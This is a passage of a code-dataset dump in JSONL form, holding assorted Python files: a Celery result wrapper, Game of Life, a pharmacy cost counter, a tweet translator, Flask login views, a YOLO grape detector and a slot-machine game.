'*26)","sub_path":"Mundo-02/ex71-2-sacar-atm.py","file_name":"ex71-2-sacar-atm.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383823323","text":"from __future__ import absolute_import\nfrom __future__ import with_statement\n\nfrom functools import partial\n\nimport celery\n\n\nclass AsyncResult(celery.result.AsyncResult):\n def __init__(self, task_id, status=None, traceback=None,\n result=None, producer=None, **kwargs):\n super(AsyncResult, self).__init__(task_id)\n self._status = status\n self._traceback = traceback\n self._result = result\n self._producer = producer\n\n @property\n def status(self):\n return self._status or super(AsyncResult, self).status\n state = status\n\n @property\n def traceback(self):\n if self._result is not None:\n return self._traceback\n else:\n return super(AsyncResult, self).traceback\n\n @property\n def result(self):\n return self._result or super(AsyncResult, self).result\n\n def get(self, callback=None):\n self._producer.fail_if_backend_not_supported()\n self._producer.consumer.wait_for(self.task_id,\n partial(self.on_result, callback),\n expires=self._producer.prepare_expires(type=int),\n persistent=self._producer.app.conf.CELERY_RESULT_PERSISTENT)\n\n def on_result(self, callback, reply):\n reply = self._producer.decode(reply)\n self._status = reply.get('status')\n self._traceback = reply.get('traceback')\n self._result = reply.get('result')\n if callback:\n callback(self._result)\n\n def _get_task_meta(self):\n self._producer.fail_if_backend_not_supported()\n return super(AsyncResult, self)._get_task_meta()\n\n def maybe_reraise(self):\n if self.state in celery.states.PROPAGATE_STATES:\n raise super(AsyncResult, self).result\n","sub_path":"tcelery/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133500916","text":"import numpy\n\nclass GameOfLife:\n # Width and heigh\n B_HEIGHT = 30\n B_WIDTH = 40\n\n # Arrays to represent board\n # Initalized in constructor\n board = []\n board_next = []\n\n def printBoard(self):\n # Iterate through 2D array\n for y in range(self.B_HEIGHT):\n for x in range(self.B_WIDTH):\n # If board location is a 0, print a \"dead\" cell, if it is 1 print a \"live\" cell\n print('-' if (not(self.board[(x, y)])) else 'X')\n # New line to end row\n print('')\n\n def iterateNeighbors(self, x, y):\n curr = (x, y) # Current (x, y) coordinate\n live_neighbors = 0 # Init number of live neighboring cells\n for modifier_x in [-1, 0, 1]: # Iterate through horizantal values for left and right\n for modifier_y in [-1, 0, 1]: # Iterate through vertical values for up and down\n offset_coor = (x + modifier_x, y + modifier_y) #Get current neighboring cell\n # Check modifers are not both 0 and not calculating on current cell\n if (offset_coor != curr): \n try:\n if(self.board[offset_coor]):\n live_neighbors += 1\n # Will be caught if coordinates are above or below the arrays index range\n except IndexError:\n continue\n\n # If cell is alive:\n # With < 2 or > 3 neighbors it will die\n if(self.board[curr] and (live_neighbors < 2 or live_neighbors > 3)):\n return 0\n # With 2 or 3 neighbors it will live\n elif(self.board[curr] and (live_neighbors == 2 or live_neighbors == 3)):\n return 1\n # If cell is dead:\n # With exactly 3 neighbors it will be born as a live cell\n elif(not(self.board[curr]) and live_neighbors == 3):\n return 1\n\n return 0\n\n def calculateNextGen(self):\n # Iterate through current game board\n for y in range(self.B_HEIGHT):\n for x in range(self.B_WIDTH):\n # Set next generations current cell to value return when examining neighbors\n self.board_next[x][y] = self.iterateNeighbors(x, y)\n\n # Overwrite this generation with the newest generation\n self.board = numpy.copy(self.board_next)\n\n def nextGeneration(self, console=False):\n # Print the game board if console mode is passsed\n if(console):\n self.printBoard()\n print('')\n\n # Get next generation (Will overwrite board automatically) \n self.calculateNextGen()\n\n def reset(self):\n self.board = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n self.board_next = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n\n def __init__(self):\n # Initalize arrays to zero\n self.board = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n self.board_next = numpy.array([[0 for y in range(self.B_HEIGHT)] for x in range(self.B_WIDTH)])\n \n \n \n","sub_path":"GameOfLife.py","file_name":"GameOfLife.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"169653580","text":"#!/usr/local/bin/python\r\nimport sys\r\nfrom collections import Counter\r\n\r\nsysIn = sys.argv\r\nfirst_name=[]\r\nlast_name=[]\r\ndrug_name=[]\r\ndrug_cost=[]\r\ntotal_cost=[]\r\ndrug_brand=[]\r\nnum_prescriber=[]\r\n\r\n\r\nwith open (sys.argv[1],'r') as f:\r\n lines = f.readlines()\r\n line_num = len(lines) \r\n \r\n for i in range (1,line_num):\r\n temp=lines[i].split('\\n')[0]\r\n drug_cost.append(temp.split(',')[-1])\r\n drug_name.append(temp.split(',')[-2])\r\n\r\ndruglist=Counter(drug_name).most_common()\r\nfor j in range (len(druglist)):\r\n drug_brand.append(druglist[j][0])\r\n num_prescriber.append(druglist[j][1]) \r\nfor j in range (len(druglist)):\r\n count=0\r\n indices = [i for i, x in enumerate(drug_name) if x == druglist[j][0]]\r\n for k in range (len(indices)):\r\n count=count+int(drug_cost[indices[k]])\r\n total_cost.append(count)\r\n \r\noutput=[drug_brand,num_prescriber,total_cost]\r\noutput1=list(map(list, zip(*output)))\r\noutput2=sorted(output1,key=lambda output1:(-output1[2],output1[0]))\r\n\r\noutput = open(sys.argv[2],'w')\r\noutput.write('drug_name,num_prescriber,total_cost\\n')\r\nfor row in output2:\r\n rowtxt = '{},{},{}'.format(row[0],row[1],row[2])\r\n output.write(rowtxt)\r\n output.write('\\n')\r\noutput.close()\r\n \r\n \r\n\r\n \r\n\r\n","sub_path":"src/pharmacy_counting.py","file_name":"pharmacy_counting.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"14344441","text":"# -*- coding: utf-8 -*-\nfrom google.cloud import translate\nimport src.database.DatabaseConnection as dc\nfrom src.preprocessing.PreprocessingTokens import removeStopwords\nimport csv\nimport time\n\n\ndef translate_text(text, target='en'):\n translate_client = translate.Client.from_service_account_json('apikey.json')\n result = translate_client.translate(text, target_language=target)\n tmp = []\n for row in result:\n tmp.append(row['translatedText'])\n return tmp\n\n\ndef makingTranslateData(game):\n listResult = []\n result = dc.getAllTweets(game)\n\n with open(f'../files/{game}2.csv', 'w+', encoding='utf-8') as csvfile:\n fieldnames = ['id', 'create_at', 'text', 'user_name', 'user_location']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n count = 0\n writer.writeheader()\n for item in result:\n id_tw, created_at, text, user_name, user_location = item\n removeEnters = text.replace('\\n', ' ')\n test = removeStopwords(removeEnters)\n item_list = [e for e in test if e not in '']\n\n if len(item_list) != 0:\n writer.writerow({'id': f'{id_tw}', 'create_at': f'{created_at}', 'text': f'{translate_text(item_list)}',\n 'user_name': f'{user_name}', 'user_location': f'{user_location}'})\n print(id_tw)\n count += 1\n\n if count == 300:\n time.sleep(20)\n count = 0\n\n print('ok')\n\n\nmakingTranslateData('BRACRC')\n","sub_path":"Extras/src/translateAPI/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606582220","text":"import sys\n\nclass GateSolver:\n def __init__(self, filename):\n self.filename = filename\n self.operations = {\n \"AND\": lambda x, y: self.get_wire(x) & self.get_wire(y),\n \"OR\": lambda x, y: self.get_wire(x) | self.get_wire(y),\n \"NOT\": lambda x: 0xFFFF & ~(self.get_wire(x)),\n \"RSHIFT\": lambda x, y: self.get_wire(x) >> self.get_wire(y),\n \"LSHIFT\": lambda x, y: self.get_wire(x) << self.get_wire(y),\n }\n self.wire_outputs = {}\n self.gates = {}\n\n def get_gates_from_file(self):\n self.gates = {}\n try:\n with open(self.filename, \"r\") as input_file:\n for line in input_file.readlines():\n line = line.strip()\n if (line == \"\"):\n continue\n (operands, wire) = line.split(\" -> \")\n self.gates[wire] = operands.split(\" \")\n except FileNotFoundError:\n print(\"File \" + filename + \" not found\")\n return self.gates\n\n def get_wire(self, wire):\n if len(self.gates.keys()) == 0:\n self.gates = self.get_gates_from_file()\n if len(self.gates.keys()) == 0:\n return None\n\n if (wire.isnumeric()):\n return int(wire)\n\n if wire not in self.wire_outputs:\n operands = self.gates[wire]\n if len(operands) == 1:\n output = self.get_wire(operands[0])\n else:\n gate = operands.pop(-2)\n output = self.operations[gate](*operands)\n self.wire_outputs[wire] = output\n return self.wire_outputs[wire]\n\ndef main():\n if (len(sys.argv) > 1):\n filename = sys.argv[1]\n else:\n filename = \"input_file.txt\"\n solver = GateSolver(filename)\n print(\"Wire a:\", solver.get_wire(\"a\"))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gate_solver.py","file_name":"gate_solver.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593608110","text":"from django import forms\n\nfrom .models import EventDetail, EventParticipant, EventTrainer\n\n\n# call for DatePickerInput\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass EventDetailForm(forms.ModelForm):\n\n class Meta:\n model = EventDetail\n fields = [\n 'title',\n 'start_date',\n 'end_date',\n 'registration_deadline',\n 'description',\n 'banner',\n 'audience_type',\n 'max_audience',\n 'venue',\n 'venue_coordinate',\n 'region',\n 'currency',\n 'registration_fee',\n\n 'open_for_all',\n 'screening_process',\n 'registration_process',\n 'payment_process',\n 'additional_fees',\n 'review_event_host',\n ]\n widgets = {\n 'start_date': DateInput(),\n 'end_date': DateInput(),\n 'registration_deadline': DateInput(),\n }\n\n labels = {\n 'title': 'Event Title',\n 'start_date': 'Start Date',\n 'end_date': 'End Date',\n 'registration_deadline': 'Registration Deadline',\n 'description': 'Description',\n 'banner': 'Banner',\n 'audience_type': 'Audience Type',\n 'max_audience': 'Max Audience',\n 'venue': 'Venue',\n 'venue_coordinate': 'Venue Coordinate',\n 'region': 'Region',\n 'currency': 'Currency',\n 'registration_fee': 'Registration Fee',\n\n 'open_for_all': 'Open for all',\n 'screening_process': 'Screening Process',\n 'Registration Process': 'registration_process',\n 'payment_process': 'Payment Process',\n 'additional_fees': 'Additional Fees',\n 'review_event_host': 'Review Event Host'\n }\n\n\nclass EventTrainerForm(forms.ModelForm):\n\n class Meta:\n model = EventTrainer\n fields = [\n 'trainer',\n 'rating',\n 'status',\n ]\n\n\nclass EventParticipantForm(forms.ModelForm):\n\n class Meta:\n model = EventParticipant\n fields = [\n 'participant_id',\n 'registration_complete',\n 'is_selection_pass',\n 'payment_confirmed',\n 'review_participant',\n 'rating_participant',\n 'confirmation_text',\n 'participant_status',\n ]\n","sub_path":"events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5388920","text":"from definitions import *\n\ndef graham_visualization(points, eps=10**-12, det=det):\n #1. Find point with smallest y, x\n p0 = min(points, key=flip)\n allP = PointsCollection(points, 'gray')\n\n #2. Sort remaining points\n def partition(points):\n pivot, *tail = points\n low, high = [], []\n ret_pivot = pivot\n for p in tail:\n d = orientation(p0, pivot, p, det, eps)\n if d == INLINE:\n if dist_sq(p0, p) > dist_sq(p0, ret_pivot):\n ret_pivot = p\n elif d == CCW: high.append(p)\n else: low.append(p)\n return low, ret_pivot, high\n\n def quick_sort(points):\n if len(points) <= 1: return points\n low, pivot, high = partition(points)\n return quick_sort(low) + [pivot] + quick_sort(high)\n\n #3. Initialize stack\n p1, p2, *tail = quick_sort(points)\n stack = [p0, p1, p2]\n\n # 4. Execute the algorithm\n i, m = 0, len(tail)\n while i < m:\n pi = tail[i]\n yield Scene([\n allP,\n PointsCollection(stack, 'green'),\n ], [ \n LinesCollection(genLines(stack), 'blue'),\n LinesCollection([[stack[-1], pi]], 'red')\n ])\n if det(stack[-2], stack[-1], pi) > eps:\n stack.append(pi)\n i += 1\n else: stack.pop()\n\n yield Scene([ allP, PointsCollection(stack, 'green'), ], [\n LinesCollection(genLines(stack) + [[stack[-1], p0]], 'blue') \n ])\n","sub_path":"lab2/graham.py","file_name":"graham.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52248755","text":"from random import shuffle\n\nliste = \"amazing excited gorgeous vibrant blazing fast stunning bold biggest fastest tremendous greatest best \\\n fantastic phenomenal delightful ambitious exciting staggering outstanding smarter massive incredible \\\n spectacular super excited super cool biggest magical revolutionary intuitive profound beautiful \\\n jaw-dropping\".upper().split()\nshuffle(liste)\n\nfor strophe in range(5):\n for n in range(2):\n for i in range(4):\n print(\"SPAM \", end='')\n print()\n print(\"{} SPAM, {} SPAM\".format(liste.pop(), liste.pop()) )\n print()","sub_path":"spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"449958231","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 18 00:34:21 2021\r\n\r\n@author: oookr\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nrect = (0,0,0)\r\nstartPoint = False\r\nendPoint = False\r\n\r\ndef mark(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print ('mark', event, x, y)\r\n cv2.circle( frame, (x,y), 60, (0,255,0), 1 )\r\n \r\n\r\ncap = cv2.VideoCapture('movingball.mp4')\r\nwaitTime = 25\r\n\r\n#Reading the first frame\r\n(grabbed, frame) = cap.read()\r\n\r\nwhile(cap.isOpened()):\r\n\r\n (grabbed, frame) = cap.read()\r\n\r\n cv2.namedWindow('frame')\r\n cv2.setMouseCallback('frame', mark) \r\n\r\n #drawing rectangle\r\n if startPoint == True and endPoint == True:\r\n cv2.circle( frame, (rect[0],rect[1]), rect[2], (0,255,0), 2 )\r\n \r\n\r\n cv2.imshow('frame',frame)\r\n\r\n key = cv2.waitKey(waitTime) \r\n\r\n if key ==ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"MWR_Object_tracking/videotracking.py","file_name":"videotracking.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244176703","text":"from typing import List, Dict\n\n\nclass TelegramUpdate:\n def __init__(self, data: dict):\n self.id = data['update_id']\n self.message = None\n if data.get('message'):\n self.message = Message(data['message'])\n if data.get('edited_message'):\n self.message = Message(data['edited_message'])\n self.callback_query = None\n if data.get('callback_query'):\n self.callback_query = CallbackQuery(data['callback_query'])\n\n\nclass Chat:\n def __init__(self, data: dict):\n self.id = data['id']\n self.type = data['type']\n\n\nclass TelegramUser:\n def __init__(self, data: dict):\n self.id = data['id']\n self.last_name = data.get('last_name', '')\n self.first_name = data.get('first_name', '')\n self.username = data.get('username', '')\n\n\nclass File:\n def __init__(self, data: dict):\n self.file_size = data['file_size']\n self.file_id = data['file_id']\n self.mime_type = data.get('mime_type')\n\n\nclass Photo(File):\n def __init__(self, data: dict):\n super().__init__(data)\n self.width = data['width']\n self.height = data['height']\n\n\nclass Video(File):\n def __init__(self, data: dict):\n super().__init__(data)\n\n\nclass Document(File):\n def __init__(self, data: dict):\n super().__init__(data)\n self.file_name = data.get('file_name', '')\n\n\nclass Voice(File):\n def __init__(self, data: dict):\n super().__init__(data)\n self.duration = data['duration']\n\n\nclass Location:\n def __init__(self, data: dict):\n self.latitude = data['latitude']\n self.longitude = data['longitude']\n\n\nclass Venue:\n def __init__(self, data: dict):\n self.foursquare_id = data.get('foursquare_id')\n self.address = data.get('address')\n self.title = data.get('title')\n self.location = Location(data['location'])\n\n\nclass Entity:\n def __init__(self, data: dict):\n self.type = data['type']\n self.length = data.get('length')\n self.offset = data.get('offset')\n\n\nclass Message:\n def __init__(self, data: dict):\n self.raw = data\n self.id = data['message_id']\n self.date = data['date']\n self.user = TelegramUser(data['from'])\n self.caption = data.get('caption')\n self.chat = Chat(data['chat'])\n self.text = data.get('text') or self.caption\n self.bot_commands = self.__get_bot_commands(data.get('entities', []),\n self.text)\n if data.get('photo'):\n self.photos = [\n Photo(photo_data) for photo_data in data.get('photo')\n ]\n if data.get('video'):\n self.video = Video(data['video'])\n if data.get('document'):\n self.document = Document(data['document'])\n if data.get('voice'):\n self.voice = Voice(data['voice'])\n if data.get('location'):\n self.location = Location(data['location'])\n if data.get('venue'):\n self.venue = Venue(data['venue'])\n\n def __get_bot_commands(self, entities: List[Dict], text: str):\n bot_cmd_entities = [entity for entity in entities\n if entity.get('type') == 'bot_command']\n return [\n text[entity['offset']:entity['length']]\n for entity in bot_cmd_entities\n ]\n\n\nclass CallbackQuery:\n def __init__(self, data: dict):\n self.id = data['id']\n self.user = TelegramUser(data['from'])\n self.message = Message(data['message'])\n self.inline_message_id = data.get('inline_message_id')\n self.data = data.get('data')\n","sub_path":"src/ext/telegram/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"493110051","text":"import math\nimport cv2\nimport PySimpleGUI as sg\nimport os.path\nimport numpy as np\n\n\ndef calculate_distance(boxes):\n\t'''Function to calculate the distance between the most left\n\tchunk and the most right chunk.\n\t'''\n\tmin = 10000\n\tmax = 0\n\n\t#gets the most left and most right x coordinate value\n\tfor box in boxes:\n\t\tif box[0] < min:\n\t\t\tmin = box[0]\n\t\t\tchunk1 = box\n\n\t\tif box[0] > max:\n\t\t\tmax = box[0]\n\t\t\tchunk2 = box\n\n\tpoint_chunk2_x = chunk2[0] + chunk2[2] #most right x coordinate\n\tpoint_chunk2_y = chunk2[1] + chunk2[3]/2 #height of most right bounding box divided by two\n\tpoint_chunk1_x = chunk1[0] #most left x coordinate\n\tpoint_chunk1_y = chunk1[1] + chunk1[3]/2 #height of most left bounding box divided by two\n\n\t#calculate distance\n\tdistance = math.sqrt((point_chunk2_x - point_chunk1_x) ** 2 + (point_chunk2_y - point_chunk1_y))\n\n\t#print(\"Calculated Distance: \", distance)\n\n\treturn distance, point_chunk1_x, point_chunk1_y, point_chunk2_x, point_chunk2_y\n\nif __name__ == \"__main__\":\n\t'''Building the Image Viewer ########################################################'''\n\t# First the window layout in 2 columns\n\tfile_list_column = [\n\t\t[\n\t\t\tsg.Text(\"Image Folder\"),\n\t\t\tsg.In(size=(25, 1), enable_events=True, key=\"-FOLDER-\"),\n\t\t\tsg.FolderBrowse(),\n\t\t],\n\t\t[\n\t\t\tsg.Listbox(\n\t\t\t\tvalues=[], enable_events=True, size=(40, 20), key=\"-FILE LIST-\"\n\t\t\t)\n\t\t],\n\t]\n\n\timage_viewer_column = [\n\t\t[sg.Text(\"Choose an image from list on left:\")],\n\t\t[sg.Text(size=(40, 1), key=\"-TOUT-\")],\n\t\t[sg.Image(key=\"-IMAGE-\")],\n\t]\n\n\t# ----- Full layout -----\n\tlayout = [\n\t\t[\n\t\t\tsg.Column(file_list_column),\n\t\t\tsg.VSeperator(),\n\t\t\tsg.Column(image_viewer_column),\n\t\t],\n\t\t[sg.Button(\"Detect\")],\n\t\t[sg.Button(\"Exit\")]\n\t]\n\n\twindow = sg.Window(\"Grape Detection Viewer\", layout)\n\t'''#############################################################################'''\n\n\n\tcfg = \"yolov4-custom.cfg\" #config file\n\tweights = \"yolov4-custom_best.weights\" #trained weights\n\tinput_size = (416, 416) #net input size\n\n\t#configure the network\n\tnet = cv2.dnn_DetectionModel(cfg, weights)\n\tnet.setInputSize(input_size)\n\tnet.setInputScale(1.0 / 255)\n\tnet.setInputSwapRB(True)\n\n\t#Application loop\n\twhile True:\n\t\tevent, values = window.read()\n\t\t#if the button Exit are pressed or the window closed, the application ends\n\t\tif event == \"Exit\" or event == sg.WIN_CLOSED:\n\t\t\tbreak\n\n\t\t# Folder name was filled in, make a list of files in the folder\n\t\tif event == \"-FOLDER-\":\n\t\t\tfolder = values[\"-FOLDER-\"]\n\t\t\ttry:\n\t\t\t\t# Get list of files in folder\n\t\t\t\tfile_list = os.listdir(folder)\n\t\t\texcept:\n\t\t\t\tfile_list = []\n\n\t\t\tfnames = [\n\t\t\t\tf\n\t\t\t\tfor f in file_list\n\t\t\t\tif os.path.isfile(os.path.join(folder, f))\n\t\t\t\t and f.lower().endswith((\".png\", \".gif\"))\n\t\t\t]\n\t\t\twindow[\"-FILE LIST-\"].update(fnames)\n\n\t\telif event == \"-FILE LIST-\": # A file was chosen from the listbox\n\t\t\ttry:\n\t\t\t\tfilename = os.path.join(\n\t\t\t\t\tvalues[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n\t\t\t\t)\n\t\t\t\twindow[\"-TOUT-\"].update(filename)\n\t\t\t\twindow[\"-IMAGE-\"].update(filename=filename) #update the window with the chosen image\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t#if the button Detect is pressed, the inference starts on the selected image\n\t\telif event == \"Detect\":\n\t\t\timage = cv2.imread(filename)\n\t\t\tclasses, confidences, boxes = net.detect(image, confThreshold=0.1, nmsThreshold=0.1)\t#make inference\n\n\t\t\twith open('obj.names', 'rt') as f:\n\t\t\t\tnames = f.read().rstrip('\\n').split('\\n')\n\n\t\t\t#calls the function to calculate distance\n\t\t\tdist, p1_x, p1_y, p2_x, p2_y = calculate_distance(boxes)\n\n\t\t\t#plot all the bounding boxes detected with its confidences\n\t\t\tfor classId, confidence, box in zip(classes.flatten(), confidences.flatten(), boxes):\n\t\t\t\tlabel = '%.2f' % confidence\n\t\t\t\tlabel = '%s: %s' % (names[classId], label)\n\t\t\t\tlabelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n\t\t\t\tleft, top, width, height = box\n\t\t\t\ttop = max(top, labelSize[1])\n\t\t\t\tcv2.rectangle(image, box, color=(0, 255, 0), thickness=3)\n\t\t\t\tcv2.rectangle(image, (left, top - labelSize[1]), (left + labelSize[0], top + baseLine), (255, 255, 255), cv2.FILLED)\n\t\t\t\tcv2.putText(image, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))\n\n\t\t\tcolor_line = (0,0,255)\n\t\t\tcolor_text = (255,255,255)\n\n\t\t\t#plot the line indicating the distance between the most left chunk and the most right\n\t\t\tcv2.line(image, (int(p1_x),int(p1_y)), (int(p2_x),int(p2_y)), color_line, 2)\n\n\t\t\t#plot informations about the detection\n\t\t\tcv2.putText(image, \"Approximate distance in pixels: \" + str(np.round(dist)), (10, 30) , cv2.FONT_HERSHEY_SIMPLEX, 1, color_text, 2)\n\t\t\tcv2.putText(image, \"Number of Chunks detected : \" + str(len(boxes)), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, 1, color_text, 2)\n\t\t\tcv2.putText(image, \"Chunks per pixel rate: \" + str(np.round(len(boxes)/np.round(dist), 4)), (10, 90), cv2.FONT_HERSHEY_SIMPLEX, 1, color_text, 2)\n\n\t\t\t#update the image variable on the GUI application\n\t\t\timgbytes = cv2.imencode(\".png\", image)[1].tobytes()\n\t\t\twindow[\"-IMAGE-\"].update(data=imgbytes)\n\n\t\t\t#cv2.imshow(\"inference window\", image)\n\t\t\t#cv2.waitKey(0)\n\n\twindow.close() #close the image viewer","sub_path":"grape_detector.py","file_name":"grape_detector.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"549748241","text":"from flask import Blueprint,flash,redirect,render_template,url_for\r\nfrom jmilkfansblog.extensions import openid\r\nfrom jmilkfansblog.forms import LoginForm,OpenIDForm,RegisterForm\r\nfrom flask_login import login_user,logout_user\r\nfrom flask_principal import Identity, AnonymousIdentity, identity_changed, current_app\r\nfrom jmilkfansblog.models import User,db\r\nfrom uuid import uuid4\r\n\r\nad = Blueprint(\r\n 'main',\r\n '__name__',\r\n template_folder='templates/admin',\r\n static_folder='static/admin',\r\n url_prefix='/main')\r\n\r\n\r\n# @ad.route('/')\r\n# def home():\r\n# return render_template('home.html')\r\n\r\n\r\n@ad.route('/register',methods=['GET','POST'])\r\ndef register():\r\n form = RegisterForm()\r\n if form.validate_on_submit():\r\n user = User(5,form.username.data,form.password.data)\r\n # user.id = str(uuid4)\r\n\r\n db.session.add(user)\r\n db.session.commit()\r\n flash('you user has beed register',category='success')\r\n return redirect(url_for('main.login'))\r\n \r\n return render_template('main/register.html',form=form)\r\n\r\n\r\n\r\n@ad.route('/login', methods=['GET', 'POST'])\r\n@openid.loginhandler\r\ndef login():\r\n \"\"\"View function for login.\r\n\r\n Flask-OpenID will be receive the Authentication-information\r\n from relay party.\r\n \"\"\"\r\n\r\n # Create the object for LoginForm\r\n form = LoginForm()\r\n # Create the object for OpenIDForm\r\n openid_form = OpenIDForm()\r\n\r\n # Send the request for login to relay party(URL).\r\n if openid_form.validate_on_submit():\r\n return openid.trg_login(\r\n openid_form.openid_url.data,\r\n ask_for=['nickname', 'email'],\r\n ask_for_optional=['fullname'])\r\n\r\n # Try to login the relay party failed.\r\n openid_errors = openid.fetch_error()\r\n if openid_errors:\r\n flash(openid_errors, category=\"danger\")\r\n\r\n # Will be check the account whether rigjt.\r\n if form.validate_on_submit():\r\n\r\n # Using session to check the user's login status\r\n # Add the user's name to cookie.\r\n # session['username'] = form.username.data\r\n\r\n user = User.query.filter_by(username=form.username.data).one()\r\n\r\n # Using the Flask-Login to processing and check the login status for user\r\n # Remember the user's login status. \r\n login_user(user, remember=form.remember.data)\r\n\r\n identity_changed.send(\r\n current_app._get_current_object(),\r\n identity=Identity(user.id))\r\n\r\n flash(\"You have been logged in.\", category=\"success\")\r\n return redirect(url_for('blog.home'))\r\n\r\n return render_template('main/login.html',\r\n form=form,\r\n openid_form=openid_form)\r\n\r\n\r\n@ad.route('/logout', methods=['GET', 'POST'])\r\ndef logout():\r\n \"\"\"View function for logout.\"\"\"\r\n\r\n # Remove the username from the cookie.\r\n # session.pop('username', None)\r\n\r\n # Using the Flask-Login to processing and check the logout status for user.\r\n logout_user()\r\n\r\n identity_changed.send(\r\n current_app._get_current_object(),\r\n identity=AnonymousIdentity())\r\n flash(\"You have been logged out.\", category=\"success\")\r\n return redirect(url_for('main.login'))","sub_path":"PycharmProjects/Reptile/Djang-flask/flask_ref/jmilkfansblog/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"252549405","text":"#programmes random from the library\r\nimport random\r\n#creates a list of values under the variable name symbols\r\nsymbols = [\"Cherry\",\"Bell\",\"Lemon\",\"Orange\",\"Star\",\"Skull\"]\r\n#gives the value of 100 to the variable user_credit\r\nuser_credit = 100\r\n#programmes it so that the variable SPIN haas a value of yes\r\nSPIN = \"yes\"\r\n#creates a loop so that while the user wants to spin and the user's credit is more than 0 then ...\r\nwhile SPIN == \"yes\" and user_credit > 0:\r\n #for every spin 20 is taken away from the user's credit\r\n user_credit = user_credit - 20\r\n #gives the variable spin 1 the value of a random value of the variable symbols\r\n spin1 = random.choice(symbols)\r\n #gives the variable spin 2 the value of a random value of the variable symbols\r\n spin2 = random.choice(symbols)\r\n #gives the variable spin 3 the value of a random value of the variable symbols\r\n spin3 = random.choice(symbols)\r\n #prints what the 3 spins are and what the user's creedit is after each go\r\n print(\"Spins :\",spin1,\",\",spin2,\",\",spin3,\"& Credit :\",user_credit)\r\n #if all 3 spins are Cherry then ...\r\n if spin1==\"Cherry\" and spin2==\"Cherry\" and spin3==\"Cherry\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Lemon then ...\r\n elif spin1==\"Lemon\" and spin2==\"Lemon\" and spin3==\"Lemon\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Orange then ...\r\n elif spin1==\"Orange\" and spin2==\"Orange\" and spin3==\"Orange\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Star then ...\r\n elif spin1==\"Star\" and spin2==\"Star\" and spin3==\"Star\" :\r\n #the user's credit increases by 50\r\n user_credit = user_credit + 50\r\n #tells the user they have gained 50 credit\r\n print(\"Well Done ! You have gained 50 credits.\")\r\n #if all 3 spins are Bell then ...\r\n elif spin1==\"Bell\" and spin2==\"Bell\" and spin3==\"Bell\" :\r\n #user's credit increases by 100\r\n user_credit = user_credit + 100\r\n #tells the user they have gained 100 credit\r\n print(\"Well Done ! You have gained 100 credits .\")\r\n #if all 3 spins are Skull then ...\r\n elif spin1==\"Skull\" and spin2==\"Skull\" and spin3==\"Skull\" :\r\n #the user loses all of their credit\r\n user_credit = user_credit - user_credit\r\n #tells the user they have lost all their credit\r\n print(\"Bad Luck! You have lost all of your credits.\")\r\n #if 2 of the spins are Skull then ...\r\n elif spin1==\"Skull\" and spin2==\"Skull\" or spin1==\"Skull\" and spin3==\"Skull\" or spin2==\"Skull\" and spin3==\"Skull\" :\r\n #the user's credit decreases by 100\r\n user_credit = user_credit - 100\r\n #tells the user they have gained 50 credit\r\n print(\"Bad Luck! You have lost 100 credits.\")\r\n #gives the variable SPIN a second value of the outcome of the question \"Do you want to spin?\"\r\n SPIN 